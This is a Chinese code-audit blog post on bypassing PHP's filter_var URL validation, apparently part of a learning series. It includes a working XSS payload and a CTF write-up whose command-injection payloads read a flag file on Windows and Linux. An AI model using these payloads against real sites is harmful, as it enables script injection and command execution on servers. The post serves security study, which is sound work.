简介

// composer require "twig/twig"

require 'vendor/autoload.php';

class Template {

  private $twig;

  public function __construct() {

    $indexTemplate = '<img ' .

      'src="https://loremflickr.com/320/240">' .

      '<a href="{{link|escape}}">Next slide &raquo;</a>';

    // Default twig setup, simulate loading

    // index.html file from disk

    $loader = new Twig\Loader\ArrayLoader([

      'index.html' => $indexTemplate

    ]);

    $this->twig = new Twig\Environment($loader);

  }

  public function getNexSlideUrl() {

    $nextSlide = $_GET['nextSlide'];

    return filter_var($nextSlide, FILTER_VALIDATE_URL);

  }

  public function render() {

    echo $this->twig->render(

      'index.html',

      ['link' => $this->getNexSlideUrl()]

    );

  }

}

(new Template())->render();

filter_var() 函数通过指定的过滤器过滤变量。

filter_var(variable, filter, options)

variable 必需。规定要过滤的变量。

filter 可选。规定要使用的过滤器的 ID。

options 规定包含标志/选项的数组。检查每个过滤器可能的标志和选项。

FILTER_VALIDATE_URL 过滤器把值作为 URL 进行验证。

eg:

<?

$url=filter_var($_GET['url'],FILTER_VALIDATE_URL);

 var_dump($url);

 echo '<br>';

 $url=htmlspecialchars($url);

 var_dump($url);

 echo "<a href='$url'>Next slide</a>"

 ?>

payload:

?url=javascript://comment%250aalert(1);

在JS中//表示单行注释 所以后面的内容均为注释内容  %25是%的url编码 %0a是换行字符的url编码,

因为换行了后面的alert(1)就不在同一行了也不在注释的范围之内了 所以就能执行了

在执行过程中将浏览器发来的payload:javascript://comment%250aalert(1) 先解码成: javascript://comment%0aalert(1) 存储在变量 $url中

然后用户点击链接就会触发弹窗!

简介

1

CTF例题

代码1

// index.php

<?php

$url = $_GET['url'];

if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){

    $site_info = parse_url($url);

    if(preg_match('/sec-redclub.com$/',$site_info['host'])){

        exec('curl "'.$site_info['host'].'"', $result);

        echo "<center><h1>You have curl {$site_info['host']} successfully!</h1></center>

              <center><textarea rows='20' cols='90'>";

        echo implode(' ', $result);

    }

    else{

        die("<center><h1>Error: Host not allowed</h1></center>");

    }

}

else{

    echo "<center><h1>Just curl sec-redclub.com!</h1></center><br>

          <center><h3>For example:?url=http://sec-redclub.com</h3></center>";

}

?>

代码2

// flag.php

<?php

$flag = "HRCTF{f1lt3r_var_1s_s0_c00l}"

?>

windows环境下payload:

http://127.0.0.1/test.php?url=test://"|type=flag.php;sec-redclub.com

linux环境下payload

http://192.168.52.129:6666/index.php?url=test://"|ls;"sec-redclub.com

http://192.168.52.129:6666/index.php?url=test://"|cat<>ls;"sec-redclub.com

简介

11

------------恢复内容结束------------

[代码审计Day2] filter_var函数缺陷代码审计的更多相关文章

  1. 代码审计学习01-in_array() 函数缺陷

    一.开始代码审计之旅 01 从今天起,学习代码审计了,这篇文章就叫代码审计01吧,题目来自 PHP SECURITY CALENDAR 2017 的第一题,结合 红日安全 写的文章,开始吧. 二.先看 ...

  2. PHP代码审计02之filter_var()函数缺陷

    前言 根据红日安全写的文章,学习PHP代码审计审计的第二节内容,题目均来自PHP SECURITY CALENDAR 2017,讲完这个题目,会有一道CTF题目来进行巩固,外加一个实例来深入分析,想了 ...

  3. PHP-Audit-Labs-Day2 - filter_var函数缺陷

    目录 分析 示例 payload 修复建议 Day02-CTF题解 参考链接 分析 先看源码 // composer require "twig/twig" require 've ...

  4. filter_var()函数

    我们使用 payload :?url=javascript://comment%250aalert(1) ,可以执行 alert 函数: 实际上,这里的 // 在JavaScript中表示单行注释,所 ...

  5. PHP代码审计01之in_array()函数缺陷

    前言 从今天起,结合红日安全写的文章,开始学习代码审计,题目均来自PHP SECURITY CALENDAR 2017,讲完这个题目,会再用一道有相同问题的CTF题来进行巩固.下面开始分析. 漏洞分析 ...

  6. 代码审计之create_function()函数

    0x00 create_function()简介 适用范围:PHP 4> = 4.0.1,PHP 5,PHP 7 功能:根据传递的参数创建匿名函数,并为其返回唯一名称. 语法: create_f ...

  7. PHP代码审计之create_function()函数

    0x00 create_function()简介 适用范围:PHP 4> = 4.0.1,PHP 5,PHP 7 功能:根据传递的参数创建匿名函数,并为其返回唯一名称. 语法: 1 create ...

  8. PHP filter_var 函数用法

    先介绍下PHP Filter PHP手册地址:http://php.net/manual/zh/ref.filter.php PHP 过滤器用于对来自非安全来源的数据(比如用户输入)进行验证和过滤. ...

  9. 学习笔记:filter_var()函数

    PHP 过滤器用于对来自非安全来源的数据(比如用户输入)进行验证和过滤 filter_var() 函数通过指定的过滤器过滤变量. 如果成功,则返回已过滤的数据,如果失败,则返回 false. 语法 f ...

随机推荐

  1. C# 微信共享收货地址 V1.6

    //使用微信共享收货地址在跳转到当前页面的路径上必须要包含Code和state这两个获取用户信息的参数//例如 <a href="ProductOrder.aspx?OID=<% ...

  2. matplotlib中文标签乱码

    在python的安装目录下 找到~\Lib\site-packages\matplotlib\mpl-data 将字体文件(例如黑体SimHei.ttf,一般C:\Windows\Fonts路径下就有 ...

  3. Github上的沙雕项目,玩100遍都不够

    这段时间大家在家自我隔离.居家办公憋坏了吧.为了打发这种无聊的生活,我决定拿出我在github上珍藏多年的沙雕项目,让大家在无聊的时候可以打发时间. Github作为互联网上最大的开源社区,一直备受程 ...

  4. centos 7安装搜狗输入法之失败案例

    最近打算在旧电脑上安装centos用,先用虚拟机做个测试 默认的intelligence pinyin不太好用,打算安装搜狗输入法.在网上找了几篇看起来还"不错"的, 基本上来第一 ...

  5. 自学Python可以吗?怎样从入门到大师?我写这篇文章告诉你

    前言 很多粉丝朋友问我该如何去学习爬虫.学习Python.自学能找到工作吗?等一系列的问题.今天我就来回答一下大家. 第一点 确定好方向与目标 当决定踏入这个行业那一刻起,我想每一个人都爱已经准备投身 ...

  6. JS 计算日期相减得天数

    言简意赅不呼哨直接懂,可以封装的可以根据自己的需求封装一下 var date1="2020-10-23";var date2="2020-10-26";var ...

  7. openspiel 随笔 05.05

    现阶段的任务是向openspiel 中添加e一个自己的游戏 上次已经将大体的逻辑写完了,但运行时出了问题.state 为空. Incorrect number of characters in str ...

  8. JAVA类库之——Character类(持续更新)

    Character 类 目录 Character 类 判断该字符是不是一个数字的方法:isDigit(ch) 判断该字符是不是一个字母的方法:isLetter(ch) 判断该字符是不是一个数字或字母的 ...

  9. 测试可变字符序列stringBuilder

    测试可变字符序列 stringBuilder(线程不安全,效率高,一般用),stringBuffer(线程安全,效率低)stringBuilder,stringBuffer和string的区别前者可变 ...

  10. 基于 prometheus 的微服务指标监控

    基于prometheus的微服务指标监控 服务上线后我们往往需要对服务进行监控,以便能及早发现问题并做针对性的优化,监控又可分为多种形式,比如日志监控,调用链监控,指标监控等等.而通过指标监控能清晰的 ...